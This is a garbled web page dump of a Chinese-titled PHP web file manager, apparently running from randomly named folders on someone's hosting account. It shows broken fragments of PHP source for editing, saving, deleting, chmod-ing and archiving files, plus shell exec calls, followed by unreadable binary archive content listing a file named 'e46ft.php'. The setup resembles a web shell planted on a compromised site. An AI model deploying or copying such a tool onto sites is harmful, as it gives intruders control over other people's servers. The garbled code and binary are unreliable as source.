芝麻web文件管理V1.00

编辑当前文件:/home/gettoplisting/public_html/esd8wv/lwycpd.tar

""

:
File size:
MIME-type:
:
:
:
: %
'.lng('Image size').': ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '
'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo ''.lng('Charset').': ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; } ?>

 
 
     
'; } else if($online_viewer == 'microsoft') { echo ''; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo ''; foreach ($filenames as $fn) { if ($fn['folder']) { echo '' . fanco($fn['name']) . '
'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; } } echo '
'; } else { echo '

'.lng('Error while fetching archive info').'

'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '

'; } } elseif ($is_audio) { // Audio content echo '

'; } elseif ($is_video) { // Video content echo '
'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '
' . fanco($content) . '
'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '
' . fanco($content) . '
'; } echo $content; } ?>
'. $file. ''; header('X-XSS-Protection:0'); fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; // normal editer $isNormalEditor = true; if (isset($_GET['env'])) { if ($_GET['env'] == "ace") { $isNormalEditor = false; } } // Save File if (isset($_POST['savedata'])) { $writedata = $_POST['savedata']; $fd = fopen($file_path, "w"); @fwrite($fd, $writedata); fclose($fd); fm_set_msg(lng('File Saved Successfully')); } $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize = filesize($file_path); $is_text = false; $content = ''; // for text if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?>
' . htmlspecialchars($content) . ''; echo ''; } elseif ($is_text) { echo '
' . htmlspecialchars($content) . '
'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?>

:

 

'?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?> '?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
..
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?>
"; return; } echo "$external[$key]"; } function verifyToken($token) { if (hash_equals($_SESSION['token'], $token)) { return true; } return false; } /** * Delete file or folder (recursively) * @param string $path * @return bool */ function fm_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } function fm_rchmod($path, $filemode, $dirmode) { if (is_dir($path)) { if (!chmod($path, $dirmode)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { return false; } } } } return true; } elseif (is_link($path)) { return true; } elseif (is_file($path)) { return chmod($path, $filemode); } return false; } function fm_is_valid_ext($filename) { $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; $ext = pathinfo($filename, PATHINFO_EXTENSION); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; return ($isFileAllowed) ? true : false; } function fm_rename($old, $new) { $isFileAllowed = fm_is_valid_ext($new); if(!is_dir($old)) { if (!$isFileAllowed) return false; } return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null; } function fm_rcopy($path, $dest, $upd = true, $force = true) { if (is_dir($path)) { if (!fm_mkdir($dest, $force)) { return false; } $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) { $ok = false; } } } } return $ok; } elseif (is_file($path)) { return fm_copy($path, $dest, $upd); } return false; } function fm_mkdir($dir, $force) { if (file_exists($dir)) { if (is_dir($dir)) { return $dir; } elseif (!$force) { return false; } unlink($dir); } return mkdir($dir, 0777, true); } function fm_copy($f1, $f2, $upd) { $time1 = filemtime($f1); if (file_exists($f2)) { $time2 = filemtime($f2); if ($time2 >= $time1 and $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } function fm_get_display_path($file_path) { global $path_display_mode, $root_path, $root_url; switch ($path_display_mode) { case 'relative': return array( 'label' => 'Path', 'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path))) ); case 'host': $relative_path = str_replace($root_path, '', $file_path); return array( 'label' => 'Host Path', 'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) ); case 'full': default: return array( 'label' => 'Full Path', 'path' => fanco(fm_convert_win($file_path)) ); } } function fm_is_exclude_items($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) { return true; } return false; } function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } function fm_get_size($file) { static $iswin; static $isdarwin; if (!isset($iswin)) { $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); } if (!isset($isdarwin)) { $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); } static $exec_works; if (!isset($exec_works)) { $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo EXEC') == 'EXEC'); } // try a shell command if ($exec_works) { $arg = escapeshellarg($file); $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // try the Windows COM interface if ($iswin and class_exists("COM")) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile( realpath($file) ); $size = $f->Size; } catch (Exception $e) { $size = null; } if (ctype_digit($size)) { return $size; } } // if all else fails return filesize($file); } function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = ($size > 0) ? floor(log($size, 1024)) : 0; $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } function fm_get_directorysize($directory) { $bytes = 0; $directory = realpath($directory); if ($directory !== false and $directory != '' and file_exists($directory)){ foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){ $bytes += $file->getSize(); } } return $bytes; } function fm_get_zif_info($path, $ext) { if ($ext == 'zip' and function_exists('zip_open')) { $arch = @zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = @zip_read($arch)) { $zip_name = @zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => @zip_entry_filesize($zip_entry), 'compressed_size' => @zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder ); } @zip_close($arch); return $filenames; } } elseif($ext == 'tar' and class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach(new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("ph" . "ar://".$path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } function fanco($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } function fm_set_msg($msg, $status = 'ok') { $_SESSION[DN_CESSION_ID]['message'] = $msg; $_SESSION[DN_CESSION_ID]['status'] = $status; } function fm_is_utf8($string) { return preg_match('//u', $string); } function fm_convert_win($filename) { if (FM_IS_WIN and function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } function fm_object_to_array($obj) { if (!is_object($obj) and !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'ts': case 'jsx': case 'tsx': case 'hbs': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': case 'htaccess': case 'yaml': case 'yml': case 'toml': case 'tmp': case 'top': case 'bot': case 'dat': case 'bak': case 'htpasswd': case 'pl': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'tbz2': case 'tbz': case 'zip': case 'rar': case 'gz': case 'tgz': case 'tar': case '7z': case 'xz': case 'txz': case 'zst': case 'tzst': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': case 'webm': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl' ); } function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', 'application/json', ); } function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'insertion
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) and count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[DN_CESSION_ID]['message'] . '

'; unset($_SESSION[DN_CESSION_ID]['message']); unset($_SESSION[DN_CESSION_ID]['status']); } } function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fanco(APP_TITLE) ?> ">
'; } ?> <?php echo fanco(APP_TITLE) ?> ">
PKf[~KX77 e46ft.phpnu[PKIperror_log.tar.gz000064400000001034151032722660007667 0ustar00Oo0{iHR_WU!U9Wc34>ҤBi ^=2m,J]qXpt-uBnVRdUF.^鍂=Nr1,. $ɳu0g8(>$uPB::f< ?[2ܘ dJ,>ށ\k'2NQ9_ s`+鋬q6;sB+ a]֟R(/9;xs)+͒?0||2qҹR Dpej,7OQ+xn?[1 n`ŬT\E_V(X3/N]s3U\-s`[c%W.u7CF=ݢt|~#Nh4˰5N~OeDNixF_)w_1ڿ5(>h\`0:+pF`=1cJNz2:lt MPWFzatFwSҕv@{>hwd%.>?5 2dHx~=PK8f[Ѣ oy5mbk.tar.gznu[KI+(`03 `hj`hjh`ldflbd7363W0࠴$h%=!4'ZA%VI:3MC15RC%>5(5(Z#$$ ?8D)VSNVA)((>'?v2sJSR52 Kr 2!.*JvQ0 F(pĻ PK8f[ pk14de.tar.gznu[ dYW\@EttgDFxffeUgeFvUw2n'2*^̬SQ"r(WD0yDG_]}""3;+#ُ^{^krw~n yb<|*9|J3r!_t[|>j"j4>|A={˃~;w;˹c{˃R_>8S+Uyn~B?Y%?~>|/w 1k/+q/_p /C_>W|73V/s_i:jR|= {_׿_*ޛkWhx}Pkoo>ʙ)gKv[o|k;k7kF/.+s~w[-ßm/?GK?jߗ<g>=EG`P n5{1κy䋫[unܺr˹M<&=/t^v?zC7Y4׽a]{52`;LJ׹F '''PFczx0Z{{~oqiyPNx{UU+g3GcQYz\lg?5?yF]|9{ģvjgݝ~Fwft8y/f:_^RλOrFftjg}\=bmf4ݝ{F#} f_Y-֌shȌ ݹg;*l4Ӛuwu*2ӚuwuAт jfݝoF}81'9:)JH7UZxZj);':@NestwujΧ]s(wS >5z9>3[*==ݝoF}@fT1LOzFOݹg4sFQ_yv. MNl53sZvkn dI~oU3m_?㏳wwbF]a'wwu?NKn)JF3錾ס/~31+/ʅ㿞+g=?{Іg?avsȊgMq&uĭW>icg ķ^Ŀ]bS'haS|?h j)+‡)|u{7g> {kgx\[yaNe7Pl'Icmt9xxccNkk),BLV|Zj1TJ ߫J+AV)W R]AnkAX.[A9_u:+Vv7ӒJP "t%mA}j ?ەMB@3@U.wbJ7=XAAEO@P]d`QnT)fX*3.Q- J!`t[PQ`'8Wv˕^J<_er%SV*@y#[cD `0U"z4BxP)a*Vq+xZe YK0<+j9 *AR0JJ o!+НC W QVX1_L*Rq3AbK*ZIF^eqp@_ukӺ5"4bGdQ7h&as2*"NJb0_Q(p @82.Φ떷!A*h6A X-*BbA@m՘y@-K.SPi'"aI`E#,u&V5\ ցw RFMhlϤ A 4{ rgDn%7<%=mAA}0[ Jۥ:JЗN7)(!Gex**'G5{ld^lQ+r':TE[jȃ4dY8se8V9`*$O"p-+nW B3nP~KZ!=ROU5YF/@$%H+ H.԰M5ľLˍV;2àbj^/K%h[VYn[7-ۡzlVSP5RN^" 6P 2f50d?U%e a%ab+-bp Z$DI2^IBPY2gW(he؛\$bƤˮѶPs<ofP)"o#) MS.C="i,Xn=,"ƕ:Ta$*ʏ/ *((eXU!SǾѺ&V0U` +q1JB"aG2 2T.!`'m"TՖ؅$4]!kL,TRg]du*!]hai Gp[AtcD4娎آ%*vXnH]!C.VS LPh0PaRQ%EYcW0 ] |%uX5IL6܉iD|+<^,>&*[™B\2|0+Cũ ׊V P:яz7 '*R%x&hp&J— U;B ܤ'*r>/V-0@cmm/'O}a x0aѾˉ-j͕h oV.X8z@N=RZpYE=E. tK7nl,vYxCNJ&+.wy5$+(4lW 8V94LJG~≎rtL2ȗ h7`i-4"cYW9x8NTEyh.Rԡ*YR‘fA1nr||rQ ap#g@ 3vC0+<:]6b:"=E# Ld7䉊u4X)bi?mRFN}9E eLO1Dkg&ǦS\ ZRIW.I;lr˨WqpV1db#/KUf%AdV:v N/L6i:s.|GšVUb Oma 25ȂeJ&Mqg;mP(Q>q?BN4TJ n\:#CEG &ߖ 8!NFX h 6;qAIO1bBܣ4KdP?ZRFѾx} e3T%i?`ҩthEp[ZɊZt9_#!2<7P#r`VI=׳9bp#BvRdXa^JOu>+|,b! <kB8opynjџkȁEZ =5O#L. Ihg N(=`$E 0243`+qPr_BEI35}Vy!a8H ̀-0lR8?f4UV%!'Bͺ;YC7F۹a QsF%ħޠBD5햼W1*IrGU5@Saa@XM*g1bP!%L&O҅40d]fצ؀v#([l#*Gb_@V#戼EREiS (Ğ@ n=Rp'ā-?FVW8k ,N9I>E7x@;2%yQ8_g*`Y^] )D " /kw }/5%wJ֌}zd {*-L2WrhNpwbka *0@u| lᥢ٤l]:C\K3)o6Hr%<>f֐{d_*c .ib. x'a#꫸qH k-0.DNp5QX1hW] I`ݑU:[|JS:I0sfm<&@K pcUg {Jm*HȒB&=uK1A{`Dfwyo3HOdžZ T̓,lDeܴmv;/6Wda&6:].<h,:†`ُ Rp֏M 6 )PKM<#U"0zeSgMJ2DEtsaE(iBG!۬8&՜옟YRQA<\3nj9HBdP yR$ٍwZ‡[bkJggUԕ ^xdXWE̕aqB h -q#䴙~DڭpXѺ2 Cj&yʮ%˜:-F/P0C7BU,ܽtGzÊptE,Y*%6g) *P'Ѩ'z`sE h$- ++C0zZR\$&L*J-q\޲j:S!YhK ѝH&لóp{WFKD IMPNk,-~@7 YMMq*69X͕{مMYa ~,2ĸܲ9E*=5*@t=uULi,ˆ@ǀw/tCKZV=H)YE314`"52MSv#(\õǂ0Z2i5"E 8Y7q#v#wFf6tVh֣@X}}A˨-<E[T{KmFf@\fgCU0b٘$ sIV(6-"xjHJ.s8fC.!*Ԧb ,B $AռFѡF-H)vowxMuv@evNnLbA6(Fk M+]{ V[b( %-B,[3F$iiH{`s蓬QiqZԱ=rfk TB`xnzFb4qS_fqo J6YSВ/uOfD-%x'2A.^mTd(D ePtX9\*.žq/t; &:#8: r8U.Pq0pL4˥-jUiCdWm8!.-f8d"rGe k,nR_ Rm㎄:JuC(́ɇɦg:kc|^Jj -Kirr tEz򘂻XdЦ`}M_Ƽ@*|\1ȖI]=8se#: `,7)ė-R 7殘u+BD!B .pOd.k%|T1e*a$U),]ĖHM**DL \-K?DlD~I$(qt b5G)v2 ݽEԈ1:v<:2bgpڂ%efNW+y!Š$ơm.D%|F-r LS,(- $TUeqƳǧJb3;)^ 